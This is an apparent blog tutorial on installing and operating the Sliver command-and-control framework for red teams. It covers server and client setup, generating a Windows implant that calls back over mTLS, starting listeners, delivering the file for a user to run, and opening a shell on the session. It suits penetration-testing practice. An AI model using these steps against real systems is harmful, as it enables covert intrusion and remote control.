Sliver is a Command and Control (C2) system made for penetration testers, red teams, and advanced persistent threats. It generates implants (slivers) that can run on virtually every architecture out there, and securely manage these connections through a central server. Sliver supports multiple callback protocols including DNS, TCP, and HTTP(S) to make egress simple, even when those pesky blue teams block your domains. You can even have multiple operators (players) simultaneously commanding your sliver army.

SLIVER

Documentation

Wiki: https://github.com/BishopFox/sliver/wiki/Getting-Started

GitHub: https://github.com/BishopFox/sliver/wiki

Features

  • Dynamic code generation
  • Compile-time obfuscation
  • Multiplayer-mode
  • Procedurally generated C2 over HTTP(S)
  • DNS canary blue team detection
  • Secure C2 over mTLS, HTTP(S), and DNS
  • Fully scriptable
  • Local and remote process injection
  • Windows process migration
  • Windows user token manipulation
  • Anti-anti-anti-forensics
  • Let's Encrypt integration
  • In-memory .NET assembly execution

Installation

Server

1. Download the server application

  • wget https://github.com/BishopFox/sliver/releases/download/v1.0.6-beta/sliver-server_linux.zip

2. Unzip the file

  • unzip unzip sliver-server_linux.zip

3. Install required libraries

  • sudo apt-get install mingw-w64 binutils-mingw-w64 g++-mingw-w64

4. Run the application

  • sudo ./sliver-server

5. Now we need to create a session for a player to connect, and this play the player database

  • new-player --operator vk9ops --lhost 192.168.0.21
  • players

6. The file .cfg file created will need to be installed in the clients host, so save it for later

  • [*] Saved new client config to: /home/vry4n/Desktop/vk9ops_192.168.0.21.cfg

7. Start Multiplayer mode

  • multiplayer

Client

1. Download the client application

  • wget https://github.com/BishopFox/sliver/releases/download/v1.0.6-beta/sliver-client_linux.zip

2. Unzip the application

  • unzip sliver-client_linux.zip

3. Install the required libraries

  • sudo apt-get install mingw-w64 binutils-mingw-w64 g++-mingw-w64

4. Try to run the application

  • sudo ./sliver-client

5. Copy the vk9ops_192.168.0.21.cfg file into /home/kali/.sliver-client/configs, from the server machine to the local machine

  • sudo cp vk9ops_192.168.0.21.cfg /root/.sliver-client/configs

6. Try to run the application again

  • sudo ./sliver-client

If you ever get communication error, the source of the issue might be that “multiplayer” has not been enabled at the sliver server console

How to use Sliver

1. See the help menu

  • help

2. Display players’ database

  • players

3. To create new players accounts, this can only be run from the Sliver server not the client

  • new-player --operator <username> --lhost <DNS or IP of the server>

4. Display Sliver version

  • version

5. We need to Generate an Implant (mtls, http, dns), this will generate a file saved at the location specified

generate Generate a sliver binary

MTLS

  • generate --mtls 192.168.0.21 --save ./file.exe --os Windows

6. Now, we need to start the listener

http Start an HTTP listener

https Start an HTTPS listener

dns Start a DNS listener

mtls Start an mTLS listener

  • mtls
  • jobs

7. Deliver the file, and, wait for it to be executed by the user. Once executed, you will see a message on screen

8. Show all active sessions

  • sessions -h
  • sessions

9. To kill a session run

  • session -k 1

10. Interact with a session

  • sessions
  • session -i 7

11. Running help you can see all the available commands to run

  • help

12. Run some commands to test what you can do

  • whoami
  • info
  • shell

 

Categories: RTO - Tools